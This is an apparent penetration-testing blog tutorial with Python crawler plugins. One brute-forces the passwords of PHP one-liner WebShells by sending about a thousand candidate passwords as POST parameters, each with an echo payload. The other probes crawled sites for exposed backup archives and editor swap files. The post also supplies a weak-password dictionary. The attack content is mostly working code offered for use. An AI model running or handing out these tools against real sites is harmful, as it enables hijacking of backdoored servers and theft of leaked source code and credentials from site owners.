
Developing a Crawler-Based WebShell Brute-Force Plugin and Backup Scanner

February 2, 2019 • Read: 4922 • Penetration Testing

Reference: Cracking a 100,000-Entry Dictionary in Seconds: A Clever Trick for Quickly Enumerating "One-Liner Backdoor" Passwords

That article shows how to test up to 1,000 WebShell passwords in a single HTTP request, so with this approach our brute-force plugin can finish its check very quickly. The core trick: submit every candidate password as a POST parameter name, with each value set to a PHP echo statement. A one-liner shell such as eval($_POST['pass']) executes only the value whose key matches its real password, so one request probes the entire batch at once.
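As a standalone illustration of the trick, here is a minimal sketch using the requests library; the target URL, the shell's parameter name, and the short candidate list are all hypothetical placeholders:

# Minimal sketch of the batch-probe trick, independent of the crawler.
# Assumes a one-liner shell such as <?php eval($_POST['pass']); ?>
# at a made-up URL; 'requests' stands in for the framework's Downloader.
import requests

url = 'http://target.example/shell.php'            # hypothetical target
candidates = ['admin', '123456', 'shell', 'hack']  # normally ~1000 entries

# Each candidate becomes a POST parameter name; its value is PHP code that
# prints a marker. Only the parameter matching the shell's real password
# is ever passed to eval(), so at most one marker appears in the response.
data = {c: 'echo "password is %s";' % c for c in candidates}

r = requests.post(url, data=data)
if 'password is' in r.text:
    print(r.text)  # the marker reveals which candidate worked

Note that PHP accepts at most max_input_vars (1000 by default) POST variables per request, which is presumably why the plugin below caps the dictionary at 999 entries.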

Writing the Code

The article above is worth reading several times; make sure you understand it before moving on to the code. Create a new file named webshell_check.py in the script directory:

# __author__ = 'mathor'
# Brute-force the password of every crawled .php URL as a potential one-liner shell
import sys, os
from lib.core.Download import Downloader

# Load at most 999 candidates: a full batch must stay within PHP's
# default max_input_vars limit of 1000 POST variables
filename = os.path.join(sys.path[0], 'data', 'web_shell.dic')
payload = []
with open(filename) as f:
    a = 0
    for i in f:
        payload.append(i.strip())
        a += 1
        if a == 999:
            break

class spider:
    def run(self, url, html):
        if not url.endswith('.php'):
            return False
        print("[WebShell check:]", url)
        # Each candidate becomes a POST parameter name whose value echoes a
        # marker; only the key matching the shell's password gets executed
        post_data = {}
        for _payload in payload:
            post_data[_payload] = 'echo "password is %s";' % _payload
        r = Downloader().post(url, post_data)  # post() is an instance method
        if r:
            print("webshell:%s" % r)
            return True
        return False
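If a shell is found, r contains the echoed marker somewhere in the page body. The plugin simply prints the raw response; a small optional helper (my own addition, not part of the framework) could extract the cracked password instead:

# Optional helper (not part of the plugin): pull the cracked password
# out of the response body, relying on the 'password is <pwd>' marker
# produced by the echo payload above.
import re

def extract_password(response_text):
    m = re.search(r'password is (\S+)', response_text)
    return m.group(1) if m else None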

For the dictionary, take any top-1000 weak password list, put it in the data directory, and name it web_shell.dic. For example:

1
2
3
4
5
6
7
8
9
10
404
data
tools
index0
sh3ll
shell
shel
she
shell1
shell99
root
rootshell
bypass
anonym0us
anonymous
shellnymous
fuck
system
a
b
c
abc
d
e
f
g
h
i
j
k
l
m
n
o
p
y
z
webshell
hack
h4ck

Crawler-Based Backup Scanner

Someone has already built the wheel for us: https://github.com/secfree/bcrpscan

We only need to modify its path-generation logic so that, given a crawled URL, it derives the candidate backup file addresses. Create bak_check.py in the script directory:

# __author__ = 'mathor'
import sys, os
from lib.core.Download import Downloader
from urllib.parse import urlparse

DIR_PROBE_EXTS = ['.tar.gz', '.zip', '.rar', '.tar.bz2']
FILE_PROBE_EXTS = ['.bak', '.swp', '.1']
download = Downloader()

def get_parent_paths(path):
    # '/a/b/c.php' -> ['/a/b/c.php', '/a/b/', '/a/', '/']
    paths = []
    if not path or path[0] != '/':
        return paths
    paths.append(path)
    tph = path
    if path[-1] == '/':
        tph = path[:-1]
    while tph:
        tph = tph[:tph.rfind('/') + 1]
        paths.append(tph)
        tph = tph[:-1]
    return paths

class spider:
    def run(self, url, html):
        pr = urlparse(url)
        paths = get_parent_paths(pr.path)
        web_paths = []
        for p in paths:
            if p == '/':
                # site root: probe archives named after the host, e.g. example.com.zip
                for ext in DIR_PROBE_EXTS:
                    u = '%s://%s%s%s' % (pr.scheme, pr.netloc, p, pr.netloc + ext)
                    web_paths.append(u)
            elif p[-1] == '/':
                # directory: probe archives named after the directory, e.g. /admin.zip
                for ext in DIR_PROBE_EXTS:
                    u = '%s://%s%s%s' % (pr.scheme, pr.netloc, p[:-1], ext)
                    web_paths.append(u)
            else:
                # file: probe editor/backup suffixes, e.g. index.php.bak
                for ext in FILE_PROBE_EXTS:
                    u = '%s://%s%s%s' % (pr.scheme, pr.netloc, p, ext)
                    web_paths.append(u)
        for path in web_paths:
            print("[web path]:%s" % path)
            if download.get(path) is not None:
                print("[+] bak file found: %s" % path)
        return False
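To sanity-check the generated probe URLs outside the crawler, here is a quick standalone walkthrough (the sample URL is made up for illustration):

# Standalone check of the probe-URL logic; the sample URL is invented.
from urllib.parse import urlparse

def get_parent_paths(path):
    # same logic as in bak_check.py above
    paths = []
    if not path or path[0] != '/':
        return paths
    paths.append(path)
    tph = path[:-1] if path[-1] == '/' else path
    while tph:
        tph = tph[:tph.rfind('/') + 1]
        paths.append(tph)
        tph = tph[:-1]
    return paths

pr = urlparse('http://www.example.com/admin/index.php')
print(get_parent_paths(pr.path))
# ['/admin/index.php', '/admin/', '/']
# From these, run() probes (among others):
#   http://www.example.com/admin/index.php.bak    (file backup)
#   http://www.example.com/admin.zip              (directory archive)
#   http://www.example.com/www.example.com.zip    (site-root archive)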
